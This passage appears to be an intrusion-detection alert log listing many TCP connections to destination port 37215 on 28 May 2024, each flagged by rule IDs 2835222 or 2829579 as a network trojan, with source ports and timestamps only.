          SID:2835222
          Source Port:59892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816168
          SID:2829579
          Source Port:35568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652389
          SID:2835222
          Source Port:60838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964455
          SID:2829579
          Source Port:47282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079625
          SID:2829579
          Source Port:52620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547567
          SID:2829579
          Source Port:55424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756337
          SID:2835222
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552165
          SID:2829579
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.746024
          SID:2829579
          Source Port:59024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525452
          SID:2829579
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124477
          SID:2829579
          Source Port:56044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803181
          SID:2829579
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667645
          SID:2835222
          Source Port:44610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338667
          SID:2829579
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849117
          SID:2835222
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626916
          SID:2829579
          Source Port:51170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113009
          SID:2835222
          Source Port:38294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782571
          SID:2835222
          Source Port:40664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063995
          SID:2835222
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614674
          SID:2835222
          Source Port:60726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.050882
          SID:2829579
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176267
          SID:2835222
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820532
          SID:2835222
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178153
          SID:2835222
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663991
          SID:2829579
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810437
          SID:2829579
          Source Port:53872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269853
          SID:2835222
          Source Port:53648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943529
          SID:2835222
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059715
          SID:2829579
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708331
          SID:2829579
          Source Port:47622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737402
          SID:2835222
          Source Port:44876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202578
          SID:2829579
          Source Port:51844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601432
          SID:2829579
          Source Port:33900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997024
          SID:2829579
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136851
          SID:2835222
          Source Port:48022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553067
          SID:2835222
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402187
          SID:2829579
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679565
          SID:2835222
          Source Port:48782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322195
          SID:2835222
          Source Port:38896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935283
          SID:2829579
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960657
          SID:2835222
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795126
          SID:2829579
          Source Port:54560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232866
          SID:2835222
          Source Port:51248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196429
          SID:2835222
          Source Port:35226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322817
          SID:2835222
          Source Port:38870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806892
          SID:2829579
          Source Port:59016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839371
          SID:2829579
          Source Port:60968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328776
          SID:2829579
          Source Port:59866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093519
          SID:2829579
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.624754
          SID:2835222
          Source Port:58632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299605
          SID:2829579
          Source Port:37050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812987
          SID:2835222
          Source Port:54606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635730
          SID:2835222
          Source Port:58790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671897
          SID:2829579
          Source Port:54066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329579
          SID:2829579
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.049058
          SID:2829579
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935305
          SID:2835222
          Source Port:46022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191799
          SID:2829579
          Source Port:58358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992448
          SID:2829579
          Source Port:38148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549332
          SID:2829579
          Source Port:47570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755918
          SID:2835222
          Source Port:53322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535714
          SID:2835222
          Source Port:37910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710076
          SID:2829579
          Source Port:43488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051039
          SID:2829579
          Source Port:37984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141368
          SID:2829579
          Source Port:37024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401301
          SID:2829579
          Source Port:39700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039225
          SID:2829579
          Source Port:49124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157578
          SID:2829579
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216364
          SID:2835222
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944055
          SID:2829579
          Source Port:47714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809479
          SID:2829579
          Source Port:57442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922611
          SID:2835222
          Source Port:46246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809160
          SID:2829579
          Source Port:34846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618658
          SID:2829579
          Source Port:52522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807888
          SID:2835222
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708527
          SID:2829579
          Source Port:36826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266229
          SID:2829579
          Source Port:54838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635875
          SID:2829579
          Source Port:40344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974934
          SID:2829579
          Source Port:55688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210610
          SID:2835222
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530283
          SID:2835222
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680117
          SID:2829579
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727931
          SID:2829579
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472095
          SID:2835222
          Source Port:47334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.313274
          SID:2835222
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154059
          SID:2835222
          Source Port:37498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337010
          SID:2829579
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.719062
          SID:2835222
          Source Port:59662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230055
          SID:2835222
          Source Port:43828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543200
          SID:2829579
          Source Port:52458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079657
          SID:2835222
          Source Port:55674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685702
          SID:2835222
          Source Port:42888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666791
          SID:2829579
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796227
          SID:2829579
          Source Port:57384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923640
          SID:2829579
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590905
          SID:2829579
          Source Port:55132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.937910
          SID:2835222
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061507
          SID:2835222
          Source Port:38282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168298
          SID:2829579
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.856208
          SID:2829579
          Source Port:52210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266894
          SID:2835222
          Source Port:45358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743536
          SID:2835222
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.297071
          SID:2835222
          Source Port:48670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708867
          SID:2829579
          Source Port:37288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144720
          SID:2835222
          Source Port:60582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324729
          SID:2835222
          Source Port:54320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726812
          SID:2829579
          Source Port:37364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328097
          SID:2835222
          Source Port:52702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591969
          SID:2829579
          Source Port:45746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551711
          SID:2829579
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552075
          SID:2829579
          Source Port:48184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230239
          SID:2835222
          Source Port:33790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298524
          SID:2835222
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713528
          SID:2835222
          Source Port:46218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528008
          SID:2835222
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631828
          SID:2835222
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195690
          SID:2829579
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941249
          SID:2835222
          Source Port:37258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996560
          SID:2829579
          Source Port:40326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065300
          SID:2829579
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842346
          SID:2835222
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497449
          SID:2835222
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177147
          SID:2829579
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473558
          SID:2835222
          Source Port:50300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975315
          SID:2829579
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695866
          SID:2829579
          Source Port:51360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597066
          SID:2829579
          Source Port:50018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547509
          SID:2829579
          Source Port:53986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146297
          SID:2829579
          Source Port:56210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665200
          SID:2835222
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944896
          SID:2835222
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772181
          SID:2829579
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208189
          SID:2829579
          Source Port:35780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729638
          SID:2829579
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.224887
          SID:2835222
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217129
          SID:2829579
          Source Port:37448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537550
          SID:2829579
          Source Port:38822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590912
          SID:2829579
          Source Port:45092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529016
          SID:2835222
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650199
          SID:2829579
          Source Port:56556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803296
          SID:2829579
          Source Port:33310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067130
          SID:2829579
          Source Port:39436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196703
          SID:2835222
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810506
          SID:2829579
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816742
          SID:2835222
          Source Port:50398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561083
          SID:2835222
          Source Port:41018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464078
          SID:2829579
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291630
          SID:2829579
          Source Port:40424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939320
          SID:2835222
          Source Port:35208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008815
          SID:2835222
          Source Port:39026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336947
          SID:2835222
          Source Port:52984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561188
          SID:2835222
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730168
          SID:2829579
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938696
          SID:2829579
          Source Port:53264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994994
          SID:2829579
          Source Port:51434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178414
          SID:2829579
          Source Port:58782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224257
          SID:2835222
          Source Port:44742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042085
          SID:2835222
          Source Port:47590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794383
          SID:2835222
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283645
          SID:2835222
          Source Port:47268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297476
          SID:2835222
          Source Port:52382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689306
          SID:2835222
          Source Port:37712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529215
          SID:2835222
          Source Port:34384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.184022
          SID:2829579
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299040
          SID:2829579
          Source Port:44816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021559
          SID:2835222
          Source Port:33514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223555
          SID:2835222
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330156
          SID:2835222
          Source Port:50856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295290
          SID:2829579
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593127
          SID:2829579
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562969
          SID:2829579
          Source Port:49906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227937
          SID:2835222
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592993
          SID:2835222
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285000
          SID:2829579
          Source Port:49122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044054
          SID:2829579
          Source Port:34662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636349
          SID:2835222
          Source Port:50932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283770
          SID:2835222
          Source Port:44172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812298
          SID:2835222
          Source Port:51760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984950
          SID:2829579
          Source Port:58884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891027
          SID:2835222
          Source Port:35022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117065
          SID:2829579
          Source Port:33634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.783024
          SID:2829579
          Source Port:38458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809015
          SID:2829579
          Source Port:60652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650579
          SID:2835222
          Source Port:45454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920054
          SID:2835222
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609174
          SID:2829579
          Source Port:43112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866025
          SID:2829579
          Source Port:45910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273293
          SID:2829579
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536725
          SID:2835222
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752065
          SID:2835222
          Source Port:36206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242019
          SID:2829579
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590705
          SID:2829579
          Source Port:41788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136874
          SID:2835222
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845732
          SID:2835222
          Source Port:56370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339755
          SID:2835222
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216774
          SID:2835222
          Source Port:52332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681631
          SID:2835222
          Source Port:59034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547671
          SID:2829579
          Source Port:47730
          Destination Port:37215
